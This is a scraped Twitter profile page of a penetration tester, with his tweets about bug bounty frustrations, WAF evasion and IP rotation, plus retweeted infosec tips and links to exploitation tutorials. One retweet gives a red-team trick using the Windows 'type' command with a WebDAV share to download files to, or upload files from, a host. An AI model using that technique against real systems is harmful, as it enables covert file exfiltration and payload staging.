0xCrashX (@0xcrashx) 's Twitter Profile
0xCrashX

@0xcrashx

💻 Trying to be better ⚔️

ID: 3299299802

calendar_today28-07-2015 08:24:34

2,2K Tweet

382 Takipçi

4,4K Takip Edilen

0xCrashX (@0xcrashx) 's Twitter Profile Photo

So I have been doing #Pentesting and #Redteaming for several years now. I have hacked entire companies by founding REALLY bad vulnerabilities. I eat Owasp for breakfast. I have some CVEs. Yet, I really suck at #BugBounty... What the heck am I doing wrong? 😓 #bugbountytips

0xCrashX (@0xcrashx) 's Twitter Profile Photo

I'm curious, how do you overcome WAFs in your #bugbounty automation? 🤔 Do you change IP when you get blocked? Do you just skip the endpoint? Do you wait until getting unlocked and try again? #bugbountytips #hacking #togetherwehitharder

0xCrashX (@0xcrashx) 's Twitter Profile Photo

What's the best way to change the IP for every HTTP request in #Python? In case you use #requests and a #proxy, which library could you recommend to do it? #Hacking #bugbountytips #BugBounty

YesWeHack ⠵ (@yeswehack) 's Twitter Profile Photo

#8 Vulnerable snippets🏁 Top solutions!🏆 may keen gyn, Omar Hashem, 0xCrashX, Read their solution 👇 ➡️x.com/kenjoe41/statu… ➡️x.com/OmarHashem666/… ➡️x.com/0xCrashX/statu…

mr.0range (@mr_0rng) 's Twitter Profile Photo

The Windows type command has download/upload functionality 1️⃣ Host a WebDAV server with anonymous r/w access 2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext 3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext #lolbin #redteam (Bonus ADS 😆)

The Windows type command has download/upload  functionality 
1️⃣ Host a WebDAV server with anonymous r/w access 
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
0xor0ne (@0xor0ne) 's Twitter Profile Photo

Cool series about fuzzing and LibAFL (credits Ben 'epi' Risher) 1: epi052.gitlab.io/notes-to-self/… 1.5: epi052.gitlab.io/notes-to-self/… 2: epi052.gitlab.io/notes-to-self/… 3: epi052.gitlab.io/notes-to-self/… 4: epi052.gitlab.io/notes-to-self/… 5: epi052.gitlab.io/notes-to-self/… #fuzzing #libafl #infosec #learning

Cool series about fuzzing and LibAFL (credits <a href="/epi052/">Ben 'epi' Risher</a>)

1: epi052.gitlab.io/notes-to-self/… 
1.5: epi052.gitlab.io/notes-to-self/…  
2: epi052.gitlab.io/notes-to-self/… 
3: epi052.gitlab.io/notes-to-self/… 
4: epi052.gitlab.io/notes-to-self/… 
5: epi052.gitlab.io/notes-to-self/…  

#fuzzing #libafl #infosec #learning
dr4k0nia (@dr4k0nia) 's Twitter Profile Photo

#dotnet reversing tip, sometimes we need to check the IL code. However it is quite hard to read. Did you know dnSpy can explain the IL instructions to you? Enable the following setting and enjoy :D View -> Options -> Decompiler ->ILSpy (ILSpy) -> Show IL opcode comments

#dotnet reversing tip, sometimes we need to check the IL code. However it is quite hard to read. Did you know dnSpy can explain the IL instructions to you?

Enable the following setting and enjoy :D

View -&gt; Options -&gt; Decompiler -&gt;ILSpy (ILSpy) -&gt; Show IL opcode comments
0xCrashX (@0xcrashx) 's Twitter Profile Photo

What's happening with HackerOne support? Is anyone else waiting more than a week for mediation requests to be answered? I understand they have multiple requests in the queue, but a message saying they got my request and they will look into it would be nice. #bugbounty

0xor0ne (@0xor0ne) 's Twitter Profile Photo

Excellent series on ARM64 reversing and exploitation. Credits 8kSec Heap overflow: 8ksec.io/arm64-reversin… UaF: 8ksec.io/arm64-reversin… ROP: 8ksec.io/arm64-reversin… NX and mprotect: 8ksec.io/arm64-reversin… #arm #exploit #infosec

Excellent series on ARM64 reversing and exploitation.
Credits <a href="/8kSec/">8kSec</a>

Heap overflow: 8ksec.io/arm64-reversin…
UaF: 8ksec.io/arm64-reversin…
ROP: 8ksec.io/arm64-reversin…
NX and mprotect: 8ksec.io/arm64-reversin…

#arm #exploit #infosec
0xCrashX (@0xcrashx) 's Twitter Profile Photo

Hey Sam Altman ChatGPT Logan Kilpatrick, I would really appreciate if you could add a prompt counter for GPT4 in #ChatGPT. That way we could know how many prompts we have left before we have to wait for three hours. Thanks :)